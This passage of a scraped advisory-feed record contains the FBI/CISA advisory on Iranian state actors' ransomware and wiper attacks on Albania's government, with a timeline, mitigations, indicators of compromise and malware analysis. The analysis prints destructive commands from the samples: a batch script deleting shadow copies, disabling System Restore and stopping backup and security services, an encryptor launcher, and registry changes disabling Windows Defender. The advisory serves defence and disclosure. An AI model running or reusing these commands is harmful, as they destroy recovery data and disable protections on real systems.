Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T19:54:38", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.\n\nIn July 2022, Iranian state cyber actors\u2014identifying as \u201cHomeLand Justice\u201d\u2014launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim\u2019s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.\n\nBetween May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.\n\nIn June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information\u2014either in a .zip file or a video of a screen recording with the documents shown.\n\nIn September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.\n\nDownload the PDF version of this report: pdf, 1221 kb\n\nDownload the STIX file: pdf, 44 KB\n\n### Technical Details\n\n#### **Initial access**\n\nTimeframe: Approximately 14 months before encryption and wiper attacks.\n\nDetails: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.\n\n#### Persistence and Lateral movement\n\nTimeframe: Approximately several days to two months after initial compromise.\n\nDetails: After obtaining access to the victim environment, the actors used several .aspx webshells, `pickers.aspx`, `error4.aspx`, and `ClientBin.aspx`, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.\n\n#### Exchange Server compromise\n\nTimeframe: Approximately 1-6 months after initial compromise.\n\nDetails: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.\n\n#### Likely Email exfiltration\n\nTimeframe: Approximately 8 months after initial compromise.\n\nDetails: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.\n\n#### VPN activity\n\nTimeframe: Approximately 12-14 months after initial compromise.\n\nDetails: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization\u2019s Virtual Private Network (VPN) appliance. The actors\u2019 activity primarily involved two compromised accounts. The actors executed the \u201cAdvanced Port Scanner\u201d (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.\n\n#### File Cryptor (ransomware-style file encryptor)\n\nTimeframe: Approximately 14 months after initial compromise.\n\nDetails: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.\n\n#### Wiper attack\n\nTimeframe: Approximately 14 months after initial compromise.\n\nDetails: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim\u2019s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.\n\n### Mitigations\n\nFBI and CISA recommend organizations apply the following best practices to reduce risk of compromise: \n\n * **Ensure anti-virus and anti-malware software is enabled and signature definitions are updated** regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.\n * **Adopt threat reputation services at the network device, operating system, application, and email service levels**. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.\n * If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), **ensure those vulnerabilities are patched**. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * **Monitor for unusually large amounts of data **(i.e. several GB) being transferred from a Microsoft Exchange server.\n * **Check the host-based indications**, including webshells, for positive hits within your environment.\n * Maintain and test an incident response plan.\n * Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). Note: CISA\u2019s [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.\n * Properly configure and secure internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>), including: \n * Micro-segmenting networks and functions to limit or block lateral movements.\n * Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.\n * Restricting access to trusted devices and users on the networks.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>).\n\n### **Appendix A**\n\n**Host-based IOCs**\n\n_Additional details concerning some of these files are provided in Appendix B._\n\nFile\n\n| \n\nMD5 Hash\n\n| \n\nNotes \n \n---|---|--- \n \nError4.aspx\n\n| \n\n81e123351eb80e605ad73268a5653ff3\n\n| \n\nWebshell \n \ncl.exe\n\n| \n\n7b71764236f244ae971742ee1bc6b098\n\n| \n\nWiper \n \nGoXML.exe\n\n| \n\nbbe983dba3bf319621b447618548b740\n\n| \n\nEncryptor \n \nGoxml.jpg\n\n| \n\n0738242a521bdfe1f3ecc173f1726aa1\n\n| \n \nClientBin.aspx\n\n| \n\na9fa6cfdba41c57d8094545e9b56db36\n\n| \n\nWebshell (reverse-proxy connections) \n \nPickers.aspx\n\n| \n\n8f766dea3afd410ebcd5df5994a3c571\n\n| \n\nWebshell \n \nevaluatesiteupgrade.cs.aspx\n\n| \n\nUnknown\n\n| \n\nWebshell \n \nmellona.exe\n\n| \n\n78562ba0069d4235f28efd01e3f32a82\n\n| \n\nPropagation for Encryptor \n \nwin.bat\n\n| \n\n1635e1acd72809479e21b0ac5497a79b\n\n| \n\nLaunches GoXml.exe on startup \n \nwin.bat\n\n| \n\n18e01dee14167c1cf8a58b6a648ee049\n\n| \n\nChanges desktop background to encryption image \n \nbb.bat\n\n| \n\n59a85e8ec23ef5b5c215cd5c8e5bc2ab\n\n| \n\nSaves SAM and SYSTEM hives to C:\\Temp, makes cab archive \n \ndisable_defender.exe\n\n| \n\n60afb1e62ac61424a542b8c7b4d2cf01\n\n| \n\nDisables Windows Defender \n \nrwdsk.sys\n\n| \n\n8f6e7653807ebb57ecc549cef991d505\n\n| \n\nRaw disk driver utilized by wiper malware \n \nApp_Web_bckwssht.dll\n\n| \n\ne9b6ecbf0783fa9d6981bba76d949c94\n\n| \n \n**Network-based IOCs**\n\nFBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):\n\nCountry\n\n| \n\nCompany \n \n---|--- \n \nAL\n\n| \n\nKEMINET LTD. \n \nDE\n\n| \n\nNOOP-84-247-59-0-25 \n \nDE\n\n| \n\nGSL NETWORKS \n \nGB\n\n| \n\nLON-CLIENTS \n \nGB\n\n| \n\nGB-DATACENTER \n \nNL\n\n| \n\nNL-LAYERSWITCH-20190220 \n \nNL\n\n| \n\nPANQ-45-86-200-0 \n \nUS\n\n| \n\nPRIVATE CUSTOMER \n \nUS\n\n| \n\nBANDITO NETWORKS \n \nUS\n\n| \n\nEXTERNAL \n \nUS\n\n| \n\nRU-SELENA-20080725 \n \nUS\n\n| \n\nTRANS OCEAN NETWORK \n \n## Appendix B\n\n### _Ransomware Cryptor_\n\n`GoXML.exe` is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).\n\nIf executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, `Xml Form Builder.`\n\nAll internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string `yes`. If so, it will continue to decode its internal strings.\n\nThe ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.\n\n@for /F \"skip=1\" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\\\\\root\\default Path SystemRestore Call disable \"%C\\\" & @rd /s /q %C\\$Recycle.bin)\n\n@vssadmin.exe delete shadows /all /quiet\n\n@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc\n\n@for %C in (%SrvLst%) do @net stop %C\n\n@set SrvLst=\n\n@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad\n\n@for %C in (%PrcLst%) do @taskkill /f /im \"%C.exe\"\n\n@set PrcLst=\n\n@exit \n \n--- \n \nThe syntax error consists of a missing backslash that separates `system32` and `cmd.exe`, so the process is launched as `system32cmd.exe` which is an invalid command.\n\n![](/sites/default/files/A22-250A%20pg%208.png)\n\nScript Launch Bug\n\nThe ransomware\u2019s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.\n\nThe cryptor places a file called `How_To_Unlock_MyFiles.txt` in directories with encrypted files.\n\nEach encrypted file is given the `.lck` extension and the contents of each file are only encrypted up to `0x100000` or 1,048,576 bytes which is a hard coded limit.\n\nSeparately, the actor ran a batch script (win.bat below) to set a specific desktop background.\n\n### File Details\n\nGoXml.exe \n \n--- \n \nFile Size:\n\n| \n\n43.48 KB (44520 bytes) \n \nSHA256:\n\n| \n\nf116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n \nSHA1:\n\n| \n\n5d117d8ef075f3f8ed1d4edcc0771a2a0886a376 \n \nMD5:\n\n| \n\nbbe983dba3bf319621b447618548b740 \n \nSSDeep:\n\n| \n\n768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX\n\n:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1) \n \nFile Type:\n\n| \n\nPE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows \n \nPE Header Timestamp:\n\n| \n\n2016-04-30 17:08:19 \n \nImpHash:\n\n| \n\n5b2ce9270beea5915ec9adbcd0dbb070 \n \nCert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC\n\nCert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA\n\nCert #0 SHA1 55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f \n \nwin.bat (#1, run malware) \n \n--- \n \nFile Size:\n\n| \n\n67 bytes \n \nSHA256:\n\n| \n\nbad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6 \n \nSHA1:\n\n| \n\n14b8c155e01f25e749a9726958606b242c8624b9 \n \nMD5:\n\n| \n\n1635e1acd72809479e21b0ac5497a79b \n \nSSDeep:\n\n| \n\n3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1) \n \nFile Type:\n\n| \n\nASCII text, with no line terminators \n \nContents: \n\n| \n\nstart /min C:\\ProgramData\\Microsoft\\Windows\\GoXml.exe 1 2 3 4 5 6 7 \n \nwin.bat (#2, install desktop image) \n \n--- \n \nFilename:\n\n| \n\nec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 \n \nFile Size:\n\n| \n\n765 bytes \n \nSHA256:\n\n| \n\nec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 \n \nSHA1:\n\n| \n\nfce0db6e66d227d3b82d4564446ede0c0fd7598c \n \nMD5:\n\n| \n\n18e01dee14167c1cf8a58b6a648ee049 \n \nSSDeep:\n\n| \n\n12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV\n\n+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1) \n \nFile Type:\n\n| \n\nDOS batch file text, ASCII text, with CRLF line terminators \n \nContents:\n\n@echo off\n\nsetlocal enabledelayedexpansion\n\nset \"Wtime=!time:~0,2!\"\n\nif \"!Wtime!\" leq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"c:\\programdata\\GoXml.jpg\" /f & goto done\n\nif \"!Wtime!\" geq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"c:\\programdata\\GoXml.jpg\" /f & goto done\n\n:done\n\ntimeout /t 5 >nul\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nendlocal \n \ngoxml.jpg \n \n--- \n \nFile Size:\n\n| \n\n1.2 MB (1259040 bytes) \n \nSHA256:\n\n| \n\n63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9 \n \nSHA1:\n\n| \n\n683eaec2b3bb5436f00b2172e287dc95e2ff2266 \n \nMD5:\n\n| \n\n0738242a521bdfe1f3ecc173f1726aa1 \n \nSSDeep:\n\n| \n\n12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx\n\nVjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1) \n \nFile Type:\n\n| \n\nJPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484x1752, components 4 \n \nSoftware:\n\n| \n\nAdobe Photoshop 22.4 (Windows) \n \nModify Date:\n\n| \n\n2022-07-13 20:45:20 \n \nCreate Date:\n\n| \n\n2020-06-11 02:13:33 \n \nMetadata Date:\n\n| \n\n2022-07-13 20:45:20 \n \nProfile Date Time:\n\n| \n\n2000-07-26 05:41:53 \n \nImage Size:\n\n| \n\n2484x1752 \n \nFile Size:\n\n| \n\n1.2 MB (1259040 bytes) \n \nSHA256:\n\n| \n\n63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9 \n \n### _Disk Wiper_\n\nThe files `cl.exe` and `rwdsk.sys` are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:\n\n * `in`\n * `un`\n * `wp <optional argument>`\n\nIf executed with the `in` command, the utility will output `in start!` and installs a hard coded file named rwdsk.sys as a service named `RawDisk3`. The `.SYS` file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the `cl.exe` is executed in. \n\n![](/sites/default/files/A22-250A%20pg%2010.1.png)\n\n![](/sites/default/files/A22-250A%20PG%2010.2.png)\n\n_It will also load the driver after installation_.\n\n![](/sites/default/files/A22-250A%20PG%2011.1.png)![](/sites/default/files/A22-250A%20PG%2011.2.png)\n\nThe `un` command uninstalls the service, outputting the message `\u201cun start!\u201d` to the terminal. \nThe `wp` command will access the loaded driver for raw disk access.\n\n![](/sites/default/files/A22-250A%20PG%2011.3.png)\n\nRaw Disk Access\n\nThe long hexadecimal string is hard coded in the` cl.exe` binary.\n\nRawDisk3File = (void *)toOpenRawDisk3File(\n\narg2_WideCharStr,\n\n0xC0000000,\n\nL\"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\");\n\nptrRawDiskFile = RawDisk3File;\n\nif ( RawDisk3File )\n\n{\n\nsizeDisk = toGetDiskSize(RawDisk3File);\n\nterminal_out(\"Total Bytez : %lld\\n\", sizeDisk << 9); \n \n--- \n \nThe `wp` command also takes an additional argument as a device path to place after` \\RawDisk3\\` in the output string. It is uncertain what creates this path to a device as the driver tested did not.\n\nThe output is \u201cwp starts!\u201d followed by the total bytes of the drive and the time the wipe operation takes.\n\nIf the registry key value HKLM\\SOFTWARE\\EldoS\\EventLog is set to \u201cEnabled\u201d, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\\\\..\\DriverLibraries\\DrvSupLib\\install.c. If the system does not have the SOFTWARE\\EldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility. \n\n![](/sites/default/files/AA22-250A%20PG%2012.1.png)\n\nrwdsk.sys is a \u201clegitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer\u2019s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.\"https://attack.mitre.org/software/S0364/\n\n#### File Details\n\ncl.exe\n\n| \n \n---|--- \n \nFile Size\n\n| \n\n142.5 KB (145920 bytes) \n \nSHA256\n\n| \n\ne1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \n \nSHA1\n\n| \n\nf22a7ec80fbfdc4d8ed796119c76bfac01e0a908 \n \nMD5\n\n| \n\n7b71764236f244ae971742ee1bc6b098 \n \nSSDeep\n\n| \n\n3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1) \n \nFiletype\n\n| \n\nPE32+ executable (console) x86-64, for MS Windows \n \nPE Header Timestamp\n\n| \n\n2022-07-15 13:26:28 \n \nImpHash\n\n| \n\n58d51c1152817ca3dec77f2eee52cbef \n \nrwdsk.sys\n\n| \n---|--- \n \nFile Size\n\n| \n\n38.84 KB (39776 bytes) \n \nSHA256\n\n| \n\n3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 \n \nSHA1\n\n| \n\n5e061701b14faf9adec9dd0b2423ff3cfc18764b \n \nMD5\n\n| \n\n8f6e7653807ebb57ecc549cef991d505 \n \nSSDeep\n\n| \n\n768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1) \n \nFiletype\n\n| \n\nPE32+ executable (native) x86-64, for MS Windows \n \nPEtype\n\n| \n\nDriver \n \nPE Header Timestamp\n\n| \n\n2016-03-18 14:44:54 \n \nImpHash\n\n| \n\ne233f2cdc91faafe1467d9e52f166213 \n \nCert #0 Subject\n\n| \n\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US \n \nCert #0 Issuer\n\n| \n\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US \n \nCert #0 SHA1\n\n| \n\n382c18388fb326221dfd7a77ee874f9ba60e04bf \n \nCert #1 Subject\n\n| \n\nC=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation \n \nCert #1 Issuer\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA \n \nCert #1 SHA1\n\n| \n\n30632ea310114105969d0bda28fdce267104754f \n \nCert #2 Subject\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 \n \nCert #2 Issuer\n\n| \n\nC=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root \n \nCert #2 SHA1\n\n| \n\n57534ccc33914c41f70e2cbb2103a1db18817d8b \n \nCert #3 Subject\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA \n \nCert #3 Issuer\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 \n \nCert #3 SHA1\n\n| \n\n495847a93187cfb8c71f840cb7b41497ad95c64f \n \n### Additional Files\n\n#### _Web Deployed Reverse Proxy_\n\n#### Description\n\nClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.\n\npublic static string hair_school_bracket() \n{ \nreturn Umbrella_admit_arctic.rebel_sadreporthospital(\"460F2830272A2F2266052928202F21661627252D27212368\"); //Invalid Config Package. \n}\n\npublic static string Visual_math_already() \n{ \nreturn Umbrella_admit_arctic.rebel_sadreporthospital(\"5304057E0116001607\"); //WV-RESET\n\nThe method rebel_sadreporthospital takes the first byte of the encoded string and XOR\u2019s each subsequent byte to produce the de-obfuscated string.\n\nWhen run in context of an IIS web server connecting to the ASPX file will generate a 200 <Encryption DLL Info> 1.5 output. \n\n\n![](/sites/default/files/A22-250A%20PG%2014.png)\n\n_Initial connection_\n\nThe hex string represents the following ASCII text:\n\nBase64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n\nSending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy. \n\n![](/sites/default/files/A22-250A%20PG%2014.2.png)\n\n_Second Socket Opened from POST Request_\n\nSending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.\n\n![](/sites/default/files/A22-250A%20PG%2015.1.png)\n\n_Terminate socket_\n\nThe DLL extracts a secondary \u201cEncryptionDLL\u201d named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing \u201cEncryptionDLL\u201d binaries. \n\n\n![](/sites/default/files/A22-250A%20PG%2015.2.png)\n\n_Misspelled Class Name_\n\n![](/sites/default/files/A22-250%20PG%2015.3.png)\n\n_Called Misspelled Nam_e\n\n_**File Details**_\n\nClientBin.aspx\n\n| \n---|--- \n \nFile Size\n\n| \n\n55.24 KB (56561 bytes) \n \nSHA256\n\n| \n\n7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5 \n \nSHA1\n\n| \n\ne03edd9114e7a0138d1309034cad6b461ab0035b \n \nMD5\n\n| \n\na9fa6cfdba41c57d8094545e9b56db36 \n \nSSDeep\n\n| \n\n768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2 (Ver 1.1) \n \nFiletype\n\n| \n\nHTML document text, ASCII text, with very long lines (56458) \n \nApp_Web_bckwssht.dll\n\n| \n---|--- \n \nFile Size\n\n| \n\n41.0 KB (41984 bytes) \n \nSHA256\n\n| \n\ncad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5 \n \nSHA1\n\n| \n\n49fd8de33aa0ea0c7432d62f1ddca832fab25325 \n \nMD5\n\n| \n\ne9b6ecbf0783fa9d6981bba76d949c94 \n \nSSDeep\n\n| \n\n384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6feYLP (Ver 1.1) \n \nFiletype\n\n| \n\nPE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows \n \nPEtype\n\n| \n\nDLL \n \nPE Header Timestamp\n\n| \n\n2021-06-07 10:37:55 \n \nImpHash\n\n| \n\ndae02f32a21e03ce65412f6e56942daa \n \n#### _Disable Defender_\n\n_Description_\n\ndisable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender\u2019s core functions. A command prompt with _status_ and _error_ messages is displayed as the application executes. No network activity was detected during the evaluation.\n\nUpon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.\n\n![](/sites/default/files/A22-250A%20PG%2017.1.png)\n\n_Test validate permissions_\n\nThe application will attempt to terminate the Windows Defender process by calling _TerminateProcess_ for smartscreen.exe:\n\n![](/sites/default/files/A22-250A%20PG%2017.2.png)\n\n_Attempt to kill Windows Defender_\n\nThe following Registry Keys were modified to disable Windows Defender:\n\nSet Registry Values (observed Win10 1709)\n\n| \n \n---|--- \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection \n\n| \n\n0 \n \n| \n \nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware \n\n| \n\n1 \n \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ \nStartupApproved\\Run\\SecurityHealth \n\n| \n\n03 00 00 00 5D 02 00 00 41 3B 47 9D \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\DisableAntiSpyware \n\n| \n\n1 \n \nHKLM\\System\\CurrentControlSet\\Services\\WinDefend\\Start \n\n| \n\n3 \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\ \nDisableRealtimeMonitoring \n\n| \n\n1 \n \nUpon completion and if successful the application will display the following messages and wait for user input.\n\n![](/sites/default/files/A22-250A%20PG%2018.png)\n\n_User Input_ \n\n\ndisable-defender.exe\n\n| \n---|--- \n \nFile Size\n\n| \n\n292.0 KB (299008 bytes) \n \nSHA256\n\n| \n\n45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace \n \nSHA1\n\n| \n\ne866cc6b1507f21f688ecc2ef15a64e413743da7 \n \nMD5\n\n| \n\n60afb1e62ac61424a542b8c7b4d2cf01 \n \nSSDeep\n\n| \n\n6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1) \n \nFiletype\n\n| \n\nPE32+ executable (console) x86-64, for MS Windows \n \nPEtype\n\n| \n\nEXE \n \nPE Header Timestamp\n\n| \n\n2021-10-24 15:07:32 \n \nImpHash\n\n| \n\n74a6ef9e7b49c71341e439022f643c8e \n \n### Revisions\n\nSeptember 21, 2022: Initial Version|September 22, 2022: Reordered items in the Mitigation Section|September 23, 2022: Add the STIX file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 